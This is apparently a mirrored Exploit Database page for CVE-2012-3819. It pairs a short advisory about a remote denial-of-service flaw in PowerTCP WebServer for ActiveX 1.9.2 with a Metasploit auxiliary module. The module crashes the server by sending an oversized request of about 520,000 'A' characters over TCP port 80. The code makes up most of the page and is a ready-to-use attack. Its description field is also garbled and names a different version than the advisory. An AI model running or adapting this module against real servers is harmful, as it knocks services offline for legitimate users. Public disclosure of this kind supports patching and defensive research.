PowerTCP WebServer for – ActiveX Denial of Service

• Exploit Database
• 11 阅读

• 作者： catatonicprime
  日期： 2012-09-28
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37905/

• source: https://www.securityfocus.com/bid/55761/info
  
  PowerTCP WebServer for ActiveX is prone to a remote denial-of-service vulnerability.
  
  Attackers can exploit this issue to crash the application (typically Internet Explorer), denying service to legitimate users.
  
  PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected. 
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos
  
  def initialize(info = {})
  super(update_info(info,
  'Description' => %q{ 'Name' => 'Dart Webserver
  <= 1.9.0 Stack Overflow',
  Dart Webserver from Dart Communications throws a stack
  overflow exception
  when processing large requests.
  }
  ,
  'Author' => [
  'catatonicprime'
  ],
  'Version' => '$Revision: 15513 $',
  'License' => MSF_LICENSE,
  'References' => [
  [ 'CVE', '2012-3819' ],
  ],
  'DisclosureDate' => '9/28/2012'))
  
  register_options([
  Opt::RPORT(80),
  OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',
  '520000' ])
  ])
  end
  def run
  serverIP = datastore['RHOST']
  if (datastore['RPORT'].to_i != 80)
  serverIP += ":" + datastore['RPORT'].to_s
  end
  size = datastore['SIZE']
  
  print_status("Crashing the server ...")
  request = "A" * size + "\r\n\r\n"
  connect
  sock.put(request)
  disconnect
  
  end
  end